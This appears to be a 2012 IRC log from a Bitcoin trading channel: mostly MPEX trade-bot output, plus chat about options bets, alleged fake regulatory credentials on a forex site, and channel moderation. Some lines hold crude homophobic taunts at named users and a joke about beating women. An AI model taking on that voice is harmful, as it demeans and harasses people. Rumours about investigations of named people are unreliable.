1000 @ 0.55730535 = 557.3054 BTC [-] Nov 05 11:32:12 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16676437 = 166.7644 BTC [-] Nov 05 11:32:14 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.20413404 = 204.134 BTC [-] Nov 05 11:32:15 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.25257099 = 252.571 BTC [-] Nov 05 11:32:16 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.31253772 = 312.5377 BTC [-] Nov 05 11:32:16 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.38344998 = 383.45 BTC [-] Nov 05 11:32:18 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.46509016 = 465.0902 BTC [-] Nov 05 11:32:19 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.55673896 = 556.739 BTC [-] Nov 05 11:42:25 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.1667204 = 166.7204 BTC [-] Nov 05 11:42:27 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.20409093 = 204.0909 BTC [-] Nov 05 11:42:28 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.25253005 = 252.5301 BTC [-] Nov 05 11:42:29 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.31250059 = 312.5006 BTC [-] Nov 05 11:42:30 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.38341842 = 383.4184 BTC [-] Nov 05 11:42:32 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.46506554 = 465.0655 BTC [-] Nov 05 11:42:32 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.55672184 = 556.7218 BTC [-] Nov 05 11:53:43 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16668064 = 166.6806 BTC [-] Nov 05 11:53:43 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.20405194 = 204.0519 BTC [-] Nov 05 11:53:45 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.25249302 = 252.493 BTC [-] Nov 05 11:53:46 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.312467 = 312.467 BTC [-] Nov 05 11:53:47 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.38338989 = 383.3899 BTC [-] Nov 05 11:53:48 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.46504328 = 465.0433 BTC [-] Nov 05 11:53:49 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.55670636 = 556.7064 BTC [-] Nov 05 12:18:02 [MPEX] [O.BTCUSD.C120T] 998 @ 0.16659725 = 166.2641 BTC [-] Nov 05 12:18:03 [MPEX] [O.BTCUSD.C110T] 168 @ 0.20397018 = 34.267 BTC [-] Nov 05 12:18:05 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.25241535 = 252.4154 BTC [-] Nov 05 12:18:06 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.31239657 = 312.3966 BTC [-] Nov 05 12:18:07 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.38333004 = 383.33 BTC [-] Nov 05 12:18:08 [MPEX] [O.BTCUSD.C070T] 1000 @ 0.46499661 = 464.9966 BTC [-] Nov 05 12:18:09 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.55667391 = 556.6739 BTC [-] Nov 05 12:44:05 [MPEX] [S.MPOE] 13800 @ 0.00048998 = 6.7617 BTC [-] Nov 05 12:44:06 [MPEX] [S.MPOE] 14037 @ 0.00048877 = 6.8609 BTC [-] Nov 05 12:44:07 [MPEX] [S.MPOE] 2407 @ 0.00048874 = 1.1764 BTC [-] Nov 05 12:50:25 whoa nelly Nov 05 12:50:39 im sold out on calls Nov 05 12:53:26 hmm Nov 05 12:53:48 some one is bullish Nov 05 12:54:31 extreamly bullish Nov 05 12:55:51 like 35k bitcoin's worth of bullish. Nov 05 12:56:07 meanwhile back at the ranch, http://www.reddit.com/r/Bitcoin/comments/12nam0/one_relatively_easy_step_to_destroy_the_bitcoin/c6wo1up Nov 05 12:57:47 if btc goes to 20 can you cover? Nov 05 13:02:46 yeah. Nov 05 13:03:27 if it goes to 1000 i can still cover, and even have a little bit of reserve left Nov 05 13:03:30 bu not so much. Nov 05 13:09:17 [MPEX] [S.MPOE] 10225 @ 0.00048874 = 4.9974 BTC [-] Nov 05 13:12:52 you pay out in btc i guess Nov 05 13:13:27 but that is a crazy amount of coin to send you Nov 05 13:13:40 thats a $400,000 long bet on btc Nov 05 13:13:55 its pretty reasonable id say, as we are about to halve but still... Nov 05 13:19:03 why crazy ? Nov 05 13:19:08 gox trades 40k a day. Nov 05 13:19:16 or something like that. Nov 05 13:19:56 depends how deep that guys pockets are Nov 05 13:23:01 btw the entire bitcoin is money / sec bullshit Nov 05 13:23:12 the recent ECB report pretty much says btc is not regulated in the eu. Nov 05 13:23:23 ;> Nov 05 13:23:24 giving nefario yet again the lie. no fsa was investigating glbse. Nov 05 13:34:36 [MPEX] [S.MPOE] 33700 @ 0.00048483 = 16.3388 BTC [-] Nov 05 13:34:38 [MPEX] [S.MPOE] 6950 @ 0.00048462 = 3.3681 BTC [-] Nov 05 13:34:39 [MPEX] [S.MPOE] 758 @ 0.00048387 = 0.3668 BTC [-] Nov 05 13:34:40 [MPEX] [S.MPOE] 8642 @ 0.00048378 = 4.1808 BTC [-] Nov 05 14:00:03 [MPEX] [S.MPOE] 21558 @ 0.00048378 = 10.4293 BTC [-] Nov 05 14:00:04 [MPEX] [S.MPOE] 15701 @ 0.00048366 = 7.5939 BTC [-] Nov 05 14:13:08 sec is investigating pirate Nov 05 14:13:18 they've been investigating him Nov 05 14:13:28 and ppt stuff related to glbse since atleast april Nov 05 14:14:01 i don't think it was a scam, i think it was a conspiracy Nov 05 14:14:07 the pirate conspiracy Nov 05 14:14:21 that is what the sec wants to know Nov 05 14:14:28 where the ppt people in on the scam Nov 05 14:15:16 some of the ppt guys are big fish that im sure the sec would love to take down, however i doubt they will just go after just pirate if that is all they can get Nov 05 14:15:20 will be interesting to watch Nov 05 14:27:43 [MPEX] [S.MPOE] 12600 @ 0.00048705 = 6.1368 BTC [+] Nov 05 14:27:44 [MPEX] [S.MPOE] 9550 @ 0.00048785 = 4.659 BTC [+] Nov 05 14:53:06 [MPEX] [S.MPOE] 12600 @ 0.0004851 = 6.1123 BTC [-] Nov 05 15:16:41 Chaaaang-Noi: like who? (big fish) Nov 05 15:19:07 [MPEX] [S.MPOE] 6555 @ 0.0004851 = 3.1798 BTC [-] Nov 05 15:19:08 [MPEX] [S.MPOE] 9850 @ 0.00048402 = 4.7676 BTC [-] Nov 05 15:19:10 [MPEX] [S.MPOE] 17249 @ 0.00048366 = 8.3427 BTC [-] Nov 05 15:19:11 [MPEX] [S.MPOE] 9000 @ 0.00048365 = 4.3529 BTC [-] Nov 05 15:19:12 [MPEX] [S.MPOE] 3028 @ 0.00048362 = 1.4644 BTC [-] Nov 05 15:44:17 [MPEX] [S.MPOE] 13750 @ 0.00048362 = 6.6498 BTC [-] Nov 05 16:09:47 [MPEX] [S.MPOE] 18700 @ 0.00048504 = 9.0702 BTC [+] Nov 05 16:16:07 to those interested Nov 05 16:16:07 https://bitcointalk.org/index.php?topic=114821.msg1317736#msg1317736 Nov 05 16:34:52 [MPEX] [S.MPOE] 6100 @ 0.00048504 = 2.9587 BTC [+] Nov 05 16:50:24 https://crypto.cat/ interesting Nov 05 16:59:59 [MPEX] [S.MPOE] 15400 @ 0.00048689 = 7.4981 BTC [+] Nov 05 17:25:02 [MPEX] [S.MPOE] 30037 @ 0.0004867 = 14.619 BTC [-] Nov 05 17:42:51 goomboo should change his nick to boohoo Nov 05 17:50:51 [MPEX] [S.MPOE] 27922 @ 0.00048362 = 13.5036 BTC [-] Nov 05 17:50:53 [MPEX] [S.MPOE] 10778 @ 0.0004836 = 5.2122 BTC [-] Nov 05 17:57:00 orly, kakobrekla? Nov 05 17:57:41 can you photoshop some awards and FSA reg. numbers for coinbr, too? Nov 05 18:00:14 you did NOT respond to these. Implying that FSA gave you some recycled registration number while you're waiting for papers to be processed is beyond absurd. Nov 05 18:07:11 that logo might get replaced but its not really a big deal (i thought othewise as well) as there are some background stories to it but we Nov 05 18:07:22 as for the fsa i dont get it what is the problem Nov 05 18:07:36 call fsa if you are interested in finding out the details about trading in uk Nov 05 18:07:47 venetfx is legal there Nov 05 18:07:52 as everywhere else Nov 05 18:08:01 there is just no regulation on btc or forex in slovenia or balkan Nov 05 18:08:10 where a shitload of venets customersbase is Nov 05 18:12:16 Okay. Now, what can you say about this: http://wck2.companieshouse.gov.uk/8746bef7193da7358985bbb1b7ebca32/compdetails ? Nov 05 18:12:54 it says "dissolved in 2004" and your FSA # points there Nov 05 18:13:04 i say contact fsa to give you newest info on worth ltd / venetfx Nov 05 18:14:01 No comment. Nov 05 18:14:07 exactly Nov 05 18:15:46 non uk clients dont care for fsa Nov 05 18:15:54 [MPEX] [S.MPOE] 3563 @ 0.00048584 = 1.731 BTC [+] Nov 05 18:15:56 [MPEX] [S.MPOE] 24237 @ 0.00048689 = 11.8008 BTC [+] Nov 05 18:16:22 and i dont know where my bitcoin clients are from Nov 05 18:17:32 i might not care for fsa, but might care if someone wants to looks reputable using fictional information Nov 05 18:18:33 yes, i know this is established practice on balkans Nov 05 18:19:04 so you don't see anything bad on that Nov 05 18:19:05 yup Nov 05 18:19:22 bad in what? Nov 05 18:19:40 its legal from where im sitting Nov 05 18:20:24 :) Nov 05 18:41:08 [MPEX] [S.MPOE] 30345 @ 0.0004836 = 14.6748 BTC [-] Nov 05 18:41:09 [MPEX] [S.MPOE] 3818 @ 0.0004835 = 1.846 BTC [-] Nov 05 19:08:09 [MPEX] [S.MPOE] 78582 @ 0.0004835 = 37.9944 BTC [-] Nov 05 19:08:10 [MPEX] [S.MPOE] 3718 @ 0.00048349 = 1.7976 BTC [-] Nov 05 19:33:10 [MPEX] [S.MPOE] 37000 @ 0.00048349 = 17.8891 BTC [-] Nov 05 19:58:44 [MPEX] [S.MPOE] 32 @ 0.00048349 = 0.0155 BTC [-] Nov 05 19:58:45 [MPEX] [S.MPOE] 49513 @ 0.00048341 = 23.9351 BTC [-] Nov 05 19:58:47 [MPEX] [S.MPOE] 9555 @ 0.00048334 = 4.6183 BTC [-] Nov 05 20:24:11 [MPEX] [S.MPOE] 20100 @ 0.00048505 = 9.7495 BTC [+] Nov 05 20:24:12 [MPEX] [S.MPOE] 36231 @ 0.0004855 = 17.5902 BTC [+] Nov 05 20:50:02 [MPEX] [S.MPOE] 2545 @ 0.00048334 = 1.2301 BTC [-] Nov 05 20:50:03 [MPEX] [S.MPOE] 28971 @ 0.00048325 = 14.0002 BTC [-] Nov 05 20:50:04 [MPEX] [S.MPOE] 19784 @ 0.00048323 = 9.5602 BTC [-] Nov 05 21:01:15 ;;rate patrickharnett -1 "Aug 10 08:10:17 in the event BS&T goes bust, I have more than enough assets to cover that" Nov 05 21:01:16 Rating entry successful. Your rating of -1 for user patrickharnett has been recorded. Nov 05 21:02:32 ;;rate kakobrekla -1 "Bit4X: Fake trophies/FSA number on front page? Oh, that's normal business in Balkans, let's move on" Nov 05 21:02:34 Rating entry successful. Your rating of -1 for user kakobrekla has been recorded. Nov 05 21:03:02 ? Nov 05 21:03:25 ;;ident Nov 05 21:03:26 You are not identified. Nov 05 21:04:28 there is no fsa number on bit4x Nov 05 21:04:34 and no thropies Nov 05 21:04:38 fyi Nov 05 21:04:50 i dont control venetfx Nov 05 21:05:06 ;;rate kakobrekla -1 "VenetFX: Fake trophies/FSA number on front page? Oh, that's normal business in Balkans, let's move on" Nov 05 21:05:08 Rating entry successful. Your rating for user kakobrekla has changed from -1 to -1. Nov 05 21:05:12 thx for correction Nov 05 21:05:48 and if you need corrections Nov 05 21:05:51 fsa is not fake or wrong Nov 05 21:06:00 logo might be inadequate, will be fixed prolly. Nov 05 21:06:25 but i guess at this point Nov 05 21:06:31 i have to rate you back to make that clear Nov 05 21:09:13 ;;gpg eauth EskimoBob Nov 05 21:09:14 Request successful for user EskimoBob, hostmask EskimoBob!~EskimoBob@unaffiliated/eskimobob. Get your encrypted OTP from http://bitcoin-otc.com/otps/78D6A837B8489C58 Nov 05 21:09:15 yeah, don't forget to invent funny nick for me :D Nov 05 21:09:22 mr thestringpuller Nov 05 21:09:53 you little shit gribble, why cant you answer me: wget -O - http://bitcoin-otc.com/otps/78D6A837B8489C58 | gpg --decrypt ? Nov 05 21:10:23 oh noes, i think the net chart is down again :( Nov 05 21:12:54 what net chart? Nov 05 21:15:33 [MPEX] [S.MPOE] 18071 @ 0.00048323 = 8.7324 BTC [-] Nov 05 21:18:13 lmao some asshole just tried to hijack my cookies. Nov 05 21:18:17 detailed stuff here : http://trilema.com/2012/the-storm-that-was-fel/#comment-90298 Nov 05 21:18:40 be careful if you run wordpress and some bitcoin service. Nov 05 21:19:42 wordpress is for hipsters Nov 05 21:22:30 yawell Nov 05 21:41:09 [MPEX] [S.MPOE] 10245 @ 0.00048323 = 4.9507 BTC [-] Nov 05 21:41:11 [MPEX] [S.MPOE] 29855 @ 0.00048306 = 14.4218 BTC [-] Nov 05 21:41:33 [MPEX] [S.DICE] 140 @ 0.00180025 = 0.252 BTC [+] Nov 05 22:04:39 < EskimoBob> what net chart? << the one in the topic Nov 05 22:06:56 [MPEX] [S.MPOE] 17933 @ 0.0004855 = 8.7065 BTC [+] Nov 05 22:06:58 [MPEX] [S.MPOE] 26750 @ 0.00048596 = 12.9994 BTC [+] Nov 05 22:06:59 [MPEX] [S.MPOE] 4963 @ 0.00048689 = 2.4164 BTC [+] Nov 05 22:07:00 [MPEX] [S.MPOE] 3554 @ 0.00048697 = 1.7307 BTC [+] Nov 05 22:09:25 O_o Nov 05 22:10:10 ;;ticker Nov 05 22:10:11 BTCUSD ticker | Best bid: 10.61501, Best ask: 10.65000, Bid-ask spread: 0.03499, Last trade: 10.61001, 24 hour volume: 27625.15673475, 24 hour low: 10.52000, 24 hour high: 10.90000, 24 hour vwap: 10.73199 Nov 05 22:10:41 ;;bc,24hprc Nov 05 22:10:42 10.64 Nov 05 22:12:08 ;;calc (10.64 - 6) / 10.64 - .5567063 Nov 05 22:12:09 -0.120616074436 Nov 05 22:14:27 ;;6/(.5567063 -1) Nov 05 22:14:27 Error: "6/(.5567063" is not a valid command. Nov 05 22:14:35 ;;calc 6 / (.5567063 - 1) Nov 05 22:14:36 -13.5350445991 Nov 05 22:15:16 ;;calc -7 / (.46504328 - 1) Nov 05 22:15:16 13.0851707032 Nov 05 22:15:41 ;;calc -8 / (.38338989 - 1) Nov 05 22:15:42 12.974162879 Nov 05 22:16:05 ;;calc -10 / (.25241535 - 1) Nov 05 22:16:06 13.3764116211 Nov 05 22:16:23 ;;calc -11 / (.20397018 - 1) Nov 05 22:16:24 13.8185778015 Nov 05 22:16:34 well, someone is pretty bullish Nov 05 22:18:59 mircea_popescu: that should've balanced out those short puts from the beginning of the month, right? (assuming the exchange rate doesn't go ove 13.2 or something) Nov 05 22:19:16 possibly. Nov 05 22:20:57 woah, that was ~42000 contracts Nov 05 22:27:40 hey Nov 05 22:27:49 what was the name of the bitcoinica guy Nov 05 22:29:20 zhou tong ? Nov 05 22:30:58 yeah him Nov 05 22:32:28 [MPEX] [S.MPOE] 22900 @ 0.00048697 = 11.1516 BTC [+] Nov 05 22:36:46 [MPEX] [S.MPOE] 100 @ 0.00048306 = 0.0483 BTC [-] Nov 05 22:36:58 Diablo-D3 is gay Nov 05 22:37:07 he likes the pee pee in his bum hole Nov 05 22:37:29 SupaDupa is gay Nov 05 22:37:35 he is catholic and votes republican Nov 05 22:37:50 (not that theres anything wrong with that) Nov 05 22:38:30 i wouldn't vote republican cause they're too far on the left. Nov 05 22:39:06 mircea_popescu: YES Nov 05 22:39:09 LETS BEAT THE WOMEN! Nov 05 22:39:24 I don't vote for anyone Nov 05 22:39:27 cause I don't vote Nov 05 22:39:28 http://polimedia.us/dtng/c/src/135153659710.jpg seems to be working for her. Nov 05 22:39:30 and am not american Nov 05 22:39:57 SupaDupa: thats like saying "hi, bomb me" Nov 05 22:40:07 yep Nov 05 22:40:08 go for it Nov 05 22:40:22 cant, waiting for UAV battery to charge Nov 05 22:40:23 bomb me after we cut off your electricity Nov 05 22:40:32 SupaDupa: where are you? Nov 05 22:40:42 Vancouver Island Nov 05 22:40:56 bomb the whole thing man good luck to you Nov 05 22:41:07 heh, dont have to worry about that then Nov 05 22:41:12 mother nature is coming after you anyhow Nov 05 22:43:20 yep Nov 05 22:43:26 we'll be floating away soon Nov 05 23:02:16 [MPEX] [S.MPOE] 15636 @ 0.00048697 = 7.6143 BTC [+] Nov 05 23:02:17 [MPEX] [S.MPOE] 11075 @ 0.00048785 = 5.4029 BTC [+] Nov 05 23:02:19 [MPEX] [S.MPOE] 3289 @ 0.00048793 = 1.6048 BTC [+] Nov 05 23:27:41 [MPEX] [S.MPOE] 43761 @ 0.00048306 = 21.1392 BTC [-] Nov 05 23:27:43 [MPEX] [S.MPOE] 1045 @ 0.00048306 = 0.5048 BTC [-] Nov 05 23:27:44 [MPEX] [S.MPOE] 2194 @ 0.00048295 = 1.0596 BTC [-] Nov 05 23:53:50 [MPEX] [S.MPOE] 3156 @ 0.00048295 = 1.5242 BTC [-] Nov 05 23:53:51 [MPEX] [S.MPOE] 24244 @ 0.00048286 = 11.7065 BTC [-] Nov 06 00:09:24 smickles: lets monopoly it up tonight Nov 06 00:19:11 [MPEX] [S.MPOE] 4356 @ 0.00048286 = 2.1033 BTC [-] Nov 06 00:19:12 [MPEX] [S.MPOE] 16150 @ 0.00048259 = 7.7938 BTC [-] Nov 06 00:19:14 [MPEX] [S.MPOE] 25794 @ 0.00048223 = 12.4386 BTC [-] Nov 06 00:44:46 [MPEX] [S.MPOE] 11055 @ 0.00048223 = 5.3311 BTC [-] Nov 06 00:44:48 [MPEX] [S.MPOE] 14895 @ 0.00048223 = 7.1828 BTC [-] Nov 06 03:18:27 [MPEX] [S.MPOE] 18575 @ 0.00048197 = 8.9526 BTC [-] Nov 06 03:18:29 [MPEX] [S.MPOE] 2325 @ 0.00048197 = 1.1206 BTC [-] Nov 06 03:44:13 [MPEX] [S.MPOE] 44818 @ 0.00048197 = 21.6009 BTC [-] Nov 06 04:09:55 [MPEX] [S.MPOE] 9857 @ 0.00048197 = 4.7508 BTC [-] Nov 06 04:09:57 [MPEX] [S.MPOE] 29743 @ 0.00048189 = 14.3329 BTC [-] Nov 06 04:35:29 [MPEX] [S.MPOE] 2757 @ 0.00048189 = 1.3286 BTC [-] Nov 06 04:35:30 [MPEX] [S.MPOE] 28350 @ 0.00048188 = 13.6613 BTC [-] Nov 06 04:35:32 [MPEX] [S.MPOE] 9493 @ 0.00048165 = 4.5723 BTC [-] Nov 06 04:51:07 whats new? Nov 06 04:53:10 not much, what up Nov 06 04:54:34 nada Nov 06 04:55:29 werd Nov 06 04:55:38 im debugging :] Nov 06 04:55:54 this core2duo is a pile of shit Nov 06 04:57:51 the android emulator grinds it down slooooooow Nov 06 05:01:33 [MPEX] [S.MPOE] 15850 @ 0.00048165 = 7.6342 BTC [-] Nov 06 05:26:52 [MPEX] [S.MPOE] 26257 @ 0.00048165 = 12.6467 BTC [-] Nov 06 05:26:54 [MPEX] [S.MPOE] 2843 @ 0.00048155 = 1.369 BTC [-] Nov 06 05:34:27 http://trilema.com/2012/that-didnt-last-long/ Nov 06 05:34:32 i got banned on twittar. Nov 06 05:34:45 i blame theymos. Nov 06 05:36:19 Twitter ban? Nov 06 05:45:58 twitter? or reddot Nov 06 05:52:46 [MPEX] [S.MPOE] 29762 @ 0.00048155 = 14.3319 BTC [-] Nov 06 05:52:47 [MPEX] [S.MPOE] 8400 @ 0.00048151 = 4.0447 BTC [-] Nov 06 05:52:49 [MPEX] [S.MPOE] 7638 @ 0.00048142 = 3.6771 BTC [-] Nov 06 05:54:35 banned from what and why theymos? Nov 06 05:54:43 (ubnless the forum) Nov 06 05:55:09 mircea_popescu: is that why i could never find your reddit user? Nov 06 05:55:21 smickles i have no idea. Nov 06 05:55:30 i don't think so tho, this prolly happened today. Nov 06 05:55:45 sgornick dub reddit Nov 06 05:55:59 Chaang-Noi well there's two mods, and i was chatting with the other one. Nov 06 05:56:51 theymos is a mod at reddi? Nov 06 05:56:55 reddit? Nov 06 05:57:26 yea Nov 06 05:57:36 him and hugosomething Nov 06 05:57:37 i had no idea Nov 06 05:57:45 thats too much power for one guy Nov 06 05:57:48 heh power. Nov 06 05:57:55 censorship power Nov 06 05:57:59 it's the loser strategy, get in early and entrench. Nov 06 05:58:17 it's a really sad thing to try tho, because all it gets you is a painful defeat dragged out over time. Nov 06 05:58:27 but hey, thinking is hard. overextending is easy. Nov 06 05:58:28 he must really do nothing other than mod then... Nov 06 05:58:31 does he even work? Nov 06 05:58:40 i thought he was a student Nov 06 05:58:45 oh yeah Nov 06 05:59:03 does he even lift? Nov 06 05:59:35 it would be funny if i got banned on twitter tho, seeing how i literally never post Nov 06 05:59:39 just dump tons and tons of data Nov 06 05:59:55 yeah, some random api violation Nov 06 06:00:23 "you posted the letter x to often via this method" Nov 06 06:00:31 whee Nov 06 06:00:38 now im curious Nov 06 06:00:47 o btw, smickles didja see all about me getting hacked again ? Nov 06 06:01:17 I saw something about a guy claiming you had 0days and wanted to jabber you Nov 06 06:01:19 18,351 Tweets. that's not so bad really. Nov 06 06:01:24 ya that. Nov 06 06:01:45 raoul_duke, lurks in -otc iirc Nov 06 06:01:56 (if they're using the same name) Nov 06 06:02:24 ;;seen raoul_duke Nov 06 06:02:24 I have not seen raoul_duke. Nov 06 06:02:29 o right. Nov 06 06:02:40 raoul_duke :No such nick/channel Nov 06 06:04:03 maybe i have the spelling incorrect Nov 06 06:04:40 anyway, i'm for bed. take care all! Nov 06 06:17:54 [MPEX] [S.MPOE] 15962 @ 0.00048142 = 7.6844 BTC [-] Nov 06 06:17:55 [MPEX] [S.MPOE] 20738 @ 0.00048129 = 9.981 BTC [-] **** BEGIN LOGGING AT Tue Nov 6 13:38:40 2012 Nov 06 13:56:36 [MPEX] [S.MPOE] 14380 @ 0.00048026 = 6.9061 BTC [-] Nov 06 13:56:38 [MPEX] [S.MPOE] 15450 @ 0.00048016 = 7.4185 BTC [-] Nov 06 13:56:39 [MPEX] [S.MPOE] 7477 @ 0.0004801 = 3.5897 BTC [-] Nov 06 14:22:03 [MPEX] [S.MPOE] 22300 @ 0.0004801 = 10.7062 BTC [-] Nov 06 14:37:29 jeeezus christ Nov 06 14:37:32 i forgot to pay divs Nov 06 14:37:43 scammer. Nov 06 14:37:47 all bitvps share holders: funds being deposited to MPEX right now! Nov 06 14:44:32 mircea_popescu: lol Nov 06 14:44:36 im an idiot Nov 06 14:44:39 i did a withdraw Nov 06 14:44:42 to my bitcoin wallet Nov 06 14:44:49 i shouldve just done i tdirectly tom pex Nov 06 14:44:56 that's ok, im not processing that either :D Nov 06 14:45:01 fine with me Nov 06 14:45:03 :> Nov 06 14:45:14 Tom Pex, cool guy. Nov 06 14:45:31 runnin down a dream Nov 06 14:45:46 mircea; i viewed your hacker chronicles lastn ight Nov 06 14:45:54 loltastic Nov 06 14:47:23 [MPEX] [S.MPOE] 14950 @ 0.0004801 = 7.1775 BTC [-] Nov 06 14:53:46 tom pex lol Nov 06 14:53:50 rg innit Nov 06 14:54:09 kakobrekla i think tom pex is milk. Nov 06 14:54:13 im so sick of scammers in -otc Nov 06 14:54:18 i wanted to be opped for so long Nov 06 14:54:18 what about those, who still hold that shit via GLBSE? Nov 06 14:54:20 now im opped Nov 06 14:54:21 and Nov 06 14:54:25 its a lot of work Nov 06 14:54:27 d;uh. Nov 06 14:54:32 why do you think mods suck ? Nov 06 14:54:40 they're the people who couldn't find anything better to do. Nov 06 14:54:43 theres like 20 ops on the access list Nov 06 14:54:44 rg - ur not alone bro and you are doing a bang-up job Nov 06 14:54:47 o/\.o Nov 06 14:54:48 and maybe 3 do work Nov 06 14:54:58 wizkid, coin, me Nov 06 14:55:05 wizkid is a mod ?! Nov 06 14:55:06 and SomeoneWeird now too Nov 06 14:55:14 also we have some power-bots on the way Nov 06 14:55:20 been testing em tonite Nov 06 14:55:28 i dont think the solution is bots Nov 06 14:55:36 i know its no tthe solution Nov 06 14:55:37 MrTiggr BAN EVERYONE! Nov 06 14:55:43 dont crank up at me Nov 06 14:55:50 mircea_popescu: i ban people who get scammed Nov 06 14:55:51 im just doing the best i can like rg^^ Nov 06 14:55:58 aghaha Nov 06 14:55:59 and you know what,rg Nov 06 14:56:02 also mailbomb them Nov 06 14:56:05 i dont actually mind that mentality Nov 06 14:56:09 i dont Nov 06 14:56:11 but it cant continue Nov 06 14:56:16 i know Nov 06 14:56:17 its unsustainable Nov 06 14:56:26 im also working on a secure IRC server of our own Nov 06 14:56:27 i think we're going +i again Nov 06 14:56:28 shortly Nov 06 14:56:28 but thats hard Nov 06 14:56:39 rg: i've asked nano Nov 06 14:56:44 and he will do it Nov 06 14:56:45 BUT Nov 06 14:56:45 last night i told nano Nov 06 14:56:48 not asked Nov 06 14:56:52 me too Nov 06 14:56:57 in the pvt ops chan Nov 06 14:56:58 he put me in charge Nov 06 14:56:59 ;P Nov 06 14:57:03 rg : last night +i told nano << FIFY Nov 06 14:57:04 and his basic stance is Nov 06 14:57:05 oh i dont deal with politics like that Nov 06 14:57:16 that it will only push nicksquatch into PM mode Nov 06 14:57:18 im like the black ops op Nov 06 14:57:23 they already are Nov 06 14:57:35 at least with the auth list we will make the pool of possible scammers more shallow Nov 06 14:57:45 instead of 500 people not logged in Nov 06 14:57:48 there will be 100-200 Nov 06 14:57:51 all logged into gribble Nov 06 14:57:59 100-200 is easier to sort through than 500 Nov 06 14:57:59 bro, you realise if you make the channel +m (shich you can) then gribble will enforce !voiceme Nov 06 14:58:09 just nike it bro Nov 06 14:58:11 and its also easier to see peoples patterns Nov 06 14:58:14 JUST DOOO EEHT Nov 06 14:58:23 i dont do anything without authorization Nov 06 14:58:31 or at least a majortiy vote Nov 06 14:58:31 i will back you on it Nov 06 14:58:35 between people i deemed important Nov 06 14:58:36 so will coin and Jr Nov 06 14:58:44 haha Nov 06 14:58:49 i dont care what puke-jr thinks Nov 06 14:58:54 not HIM Nov 06 14:58:56 sry Nov 06 14:59:01 jr is my pet name for SomeoneWeird Nov 06 14:59:02 just kidding luke Nov 06 14:59:03 i love you Nov 06 14:59:27 lol Nov 06 14:59:46 rg gets a crucifix burn on his back Nov 06 15:00:30 it was worth it Nov 06 15:00:35 lol Nov 06 15:00:45 go and shower now :P Nov 06 15:01:01 NO spooning Nov 06 15:01:15 aaanyway Nov 06 15:01:17 srs Nov 06 15:01:31 go the +m option i say Nov 06 15:01:39 i'll back you 100% Nov 06 15:01:45 do a vote in channel if you like Nov 06 15:02:05 #trilema is +m Nov 06 15:02:09 i can even enable the !Poll module in one of my bots for you Nov 06 15:02:25 ^^ all @ rg Nov 06 15:12:25 [MPEX] [S.MPOE] 13073 @ 0.0004801 = 6.2763 BTC [-] Nov 06 15:12:25 [MPEX] [S.MPOE] 12027 @ 0.00048008 = 5.7739 BTC [-] Nov 06 15:24:40 speaking of which : https://bitcointalk.org/index.php?topic=41793.220 Nov 06 15:24:43 wasn't maria banned 5x ? Nov 06 15:37:37 [MPEX] [S.MPOE] 24900 @ 0.00048008 = 11.954 BTC [-] Nov 06 16:02:52 [MPEX] [S.MPOE] 10099 @ 0.00048045 = 4.8521 BTC [+] Nov 06 16:02:54 [MPEX] [S.MPOE] 21201 @ 0.00048095 = 10.1966 BTC [+] Nov 06 16:08:21 i thought of some good ideas for pympex Nov 06 16:08:24 who wrote it again? Nov 06 16:12:07 azelphur Nov 06 16:12:10 but you can fork Nov 06 16:12:19 >This is nothing other than natural morals, you don't see a wolf trying to swallow a whale. You don't see a hawk trying to carry away a moose. You sometimes see snakes trying to swallow things they can't, but that's rare and it works as proof that snakes aren't really all that smart. Nov 06 16:12:26 lol, love all the buffer. Nov 06 16:13:38 buffer ? Nov 06 16:14:22 well it could be consensed to 'you are stupid' Nov 06 16:14:30 lol Nov 06 16:22:10 http://d24w6bsrhbeh9d.cloudfront.net/photo/5767326_700b.jpg Nov 06 16:23:32 lol. please don't buffer the dog. Nov 06 16:23:43 s/f/g/ Nov 06 16:29:05 [MPEX] [S.MPOE] 3773 @ 0.00048008 = 1.8113 BTC [-] Nov 06 16:29:06 [MPEX] [S.MPOE] 6500 @ 0.00048004 = 3.1203 BTC [-] Nov 06 16:45:53 mircea_popescu: mpex is 6 confirms right Nov 06 16:46:33 not rly. depends when i look Nov 06 16:48:49 is there really an advantage to using more than 2 confirms Nov 06 16:50:28 sdice uses 0 for instance Nov 06 16:51:26 i doubt sdice would be as popular if it waited for confirms Nov 06 16:51:37 prolly not. Nov 06 16:52:06 when do we get interest back on mpex deposits Nov 06 16:52:51 mac and cheese for breakfast Nov 06 16:52:52 mm Nov 06 16:55:11 [MPEX] [S.MPOE] 12400 @ 0.0004798 = 5.9495 BTC [-] Nov 06 16:55:12 [MPEX] [S.MPOE] 6000 @ 0.00047953 = 2.8772 BTC [-] Nov 06 16:55:13 [MPEX] [S.MPOE] 14700 @ 0.00047949 = 7.0485 BTC [-] Nov 06 16:57:50 any double spend attacks on sdice yet? Nov 06 16:58:33 not as far as i know Nov 06 16:58:53 arent double spends hard to do Nov 06 17:07:42 kinda. Nov 06 17:08:00 moreover, the people with the tech and mining power that'd allow it are not the sort do try such thngs Nov 06 17:08:01 yet. Nov 06 17:09:03 maybe i should allow 0 conf as well for limited amounts Nov 06 17:12:06 [MPEX] [S.BVPS] [PAID] 500000 @ 0.000116 = 58 BTC Nov 06 17:13:54 mircea why are the mpex options in different measurements Nov 06 17:13:59 like withdraw is satoshi Nov 06 17:14:01 deposit is btc Nov 06 17:18:08 